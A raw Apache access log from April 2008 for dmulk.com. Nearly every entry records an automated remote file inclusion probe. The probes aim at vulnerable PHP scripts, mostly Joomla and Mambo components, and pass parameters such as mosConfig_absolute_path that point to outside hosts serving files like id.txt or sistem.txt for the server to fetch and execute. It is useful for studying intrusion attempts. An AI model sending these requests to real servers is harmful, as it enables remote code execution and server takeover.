199.238.142.186 - - [08/Apr/2008:15:02:36 -0700] "GET /logs/access.log/lostpw.php?FORM%5Bset%5D=1&FORM%5Bsession_id%5D=1&CONFIG%5Bpath%5D=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
67.15.72.52 - - [08/Apr/2008:15:02:36 -0700] "GET /logs/index.php?pag=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.72.52 - - [08/Apr/2008:15:02:42 -0700] "GET /logs/access_080118.log/index.php?pag=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:15:02:51 -0700] "GET /logs/?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:15:02:53 -0700] "GET /?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:03:24 -0700] "GET /logs/access_080324.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:03:24 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:03:28 -0700] "GET /logs/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:03:44 -0700] "GET /logs/access_080122.log/errors.php?error=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:03:45 -0700] "GET /errors.php?error=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:03:49 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:03:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:03:49 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:03:51 -0700] "GET /logs/errors.php?error=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:03:55 -0700] "GET /logs/access_080122.log/errors.php?error=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:03:56 -0700] "GET /errors.php?error=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:03:56 -0700] "GET /logs/errors.php?error=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:03:58 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:04:02 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:04:05 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:04:08 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:15:04:25 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:04:44 -0700] "GET /logs/access_080312.log/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:05:18 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:05:18 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:05:18 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:05:36 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.254.214.3 - - [08/Apr/2008:15:05:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:15:05:45 -0700] "GET //ashnews.php?pathtoashnews=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:15:05:45 -0700] "GET /logs//ashnews.php?pathtoashnews=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.159.200.63 - - [08/Apr/2008:15:06:06 -0700] "GET /logs/access.log HTTP/1.0" 200 456257 "-" "Lynx/2.8.6rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8e" "dmulk.com"
209.126.144.75 - - [08/Apr/2008:15:06:18 -0700] "GET /logs/?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:15:06:20 -0700] "GET /?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:15:06:22 -0700] "GET /detail.php?prod=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:15:06:22 -0700] "GET /logs/detail.php?prod=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:06:47 -0700] "GET /logs/access_080312.log//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:06:48 -0700] "GET //config.php?path_to_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:06:55 -0700] "GET //config.php?path_to_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.232.41.148 - - [08/Apr/2008:15:08:03 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:15:08:27 -0700] "GET /index3.php?a=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:15:08:27 -0700] "GET /logs/index3.php?a=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
203.22.204.47 - - [08/Apr/2008:15:09:00 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:15:09:24 -0700] "GET /logs/?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 42265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [08/Apr/2008:15:09:25 -0700] "GET /?mosConfig_absolute_path=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:15:09:25 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:15:09:26 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.250.234.226 - - [08/Apr/2008:15:09:55 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.250.234.226 - - [08/Apr/2008:15:09:56 -0700] "GET //?mosConfig_absolute_path=http://xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
209.250.234.226 - - [08/Apr/2008:15:09:57 -0700] "GET /logs//?mosConfig_absolute_path=http://xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 200 42270 "-" "libwww-perl/5.808" "www.dmulk.com"
209.250.234.226 - - [08/Apr/2008:15:10:17 -0700] "GET /logs/access_080218.log//?mosConfig_absolute_path=http://xentorteam.altervista.org/Nuova_cartella/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:10:50 -0700] "GET //includes/get_header.php?vwar_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:15:12:27 -0700] "GET /logs/access_080324.log//atom.php5?page=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:15:12:28 -0700] "GET //atom.php5?page=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:15:12:29 -0700] "GET /logs//atom.php5?page=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:12:54 -0700] "GET /logs/access_080207.log/components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:12:54 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:12:55 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:13:21 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:13:21 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:13:21 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.96.247.163 - - [08/Apr/2008:15:13:22 -0700] "GET /logs/access.log//atom.php5?page=http://statesidelogistics.com/images/sistem.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:13:39 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:15:13:53 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:14:54 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:14:56 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:14:56 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:15:38 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:15:39 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:15:40 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:15:43 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:15:43 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:15:44 -0700] "GET /logs/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:15:16:02 -0700] "GET /update/update5.php?lang=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:15:16:34 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:15:16:34 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:15:16:34 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [08/Apr/2008:15:16:39 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [08/Apr/2008:15:16:40 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [08/Apr/2008:15:16:40 -0700] "GET /logs/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:16:43 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:16:50 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:16:50 -0700] "GET //components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:16:50 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:16:55 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:00 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:00 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:00 -0700] "GET //components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:01 -0700] "GET //components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:01 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:01 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:17:16 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [08/Apr/2008:15:17:21 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [08/Apr/2008:15:17:21 -0700] "GET /phphtml.php?htmlclass_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [08/Apr/2008:15:17:26 -0700] "GET /logs/phphtml.php?htmlclass_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:17:50 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:17:57 -0700] "GET /logs/access_080108.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:18:06 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:18:06 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:18:06 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:15:18:12 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:18:13 -0700] "GET /logs/access_080108.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:18:13 -0700] "GET /logs/access_080108.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:15:18:16 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:18:16 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:18:29 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:18:30 -0700] "GET /logs/access.log//errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.51.95 - - [08/Apr/2008:15:18:34 -0700] "GET /bikes/CreSTOC07/?N=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:18:53 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:18:53 -0700] "GET //include/functions_common.php?gl_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:18:54 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:19:08 -0700] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:19:09 -0700] "GET //components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:19:09 -0700] "GET /logs//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:19:19 -0700] "GET /logs/access_080329.log/components/com_joomlaboard/file_upload.php?sbp=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:19:22 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
